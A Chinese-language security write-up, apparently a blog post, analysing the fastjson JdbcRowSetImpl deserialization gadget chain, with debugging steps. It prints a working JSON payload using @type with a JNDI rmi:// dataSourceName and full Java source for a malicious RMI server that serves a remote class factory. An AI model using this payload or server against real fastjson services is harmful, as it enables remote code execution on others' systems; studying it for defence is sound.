fastjson反序列化JdbcRowSetImpl

时间:2023-12-29 13:24:38
Gadget com.sun.rowset.JdbcRowSetImpl

 setAutoCommit() -> connect() -> InitialContext.lookup()

poc如下,dataSourceName 为rmi://localhost:1090/evil:

        String payload = "{\"@type\":\"Lcom.sun.rowset.JdbcRowSetImpl;\","
+ "\"dataSourceName\":\"" + dataSourceName + "\","
+ "\"autoCommit\":\"true\"}";

RMIServer代码如下:

package org.lain.poc.jndi;
import com.sun.jndi.rmi.registry.ReferenceWrapper; import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry; /**
* @author: lanqihe
* @Date: 下午8:01 2017/12/11
* @Modified By:
* @Description: 本地注册一个register,并将恶意的类绑定
*/
public class RMIServer { public static void main(String argv[]) { try {
Registry registry = LocateRegistry.createRegistry(1090); //如果通过rmi无法找到org.lain.poc.jndi.EvilObjectFactory,则尝试从factoryLocation 获取
//因此,本地测试的话,如果factory正确,factoryLocation随便填写
Reference reference = new Reference("EvilObject",
"org.lain.poc.jndi.EvilObjectFactory",
"http://localhost:9999/" ); //客户端通过evil查找,获取到EvilObject
registry.bind("evil", new ReferenceWrapper(reference)); System.out.println("Ready!");
System.out.println("Waiting for connection......"); } catch (Exception e) {
System.out.println("RMIServer: " + e.getMessage());
e.printStackTrace();
}
}
}

调试过程如下:

加载com.sun.rowset.JdbcRowSetImpl类

fastjson反序列化JdbcRowSetImpl

poc中autoCommit设置为true.会调用setAutoCommit方法

fastjson反序列化JdbcRowSetImpl

f7跟进connect方法,调用lookup方法

fastjson反序列化JdbcRowSetImpl

继续跟进getDataSourceName,调用我们的准备的恶意rmi服务类。通过lookup方法就实例化了恶意类,从而导致构造方法的恶意代码触发。

fastjson反序列化JdbcRowSetImpl

总结:fastjson @type的值传入类,在解析json时,就会调用传入属性的getter,setter方法。如果找到一个类getter,setter能够传入可控的恶意class字节码或者是jdni服务,就能导致rce.

参考链接:

http://xxlegend.com/2017/12/06/%E5%9F%BA%E4%BA%8EJdbcRowSetImpl%E7%9A%84Fastjson%20RCE%20PoC%E6%9E%84%E9%80%A0%E4%B8%8E%E5%88%86%E6%9E%90/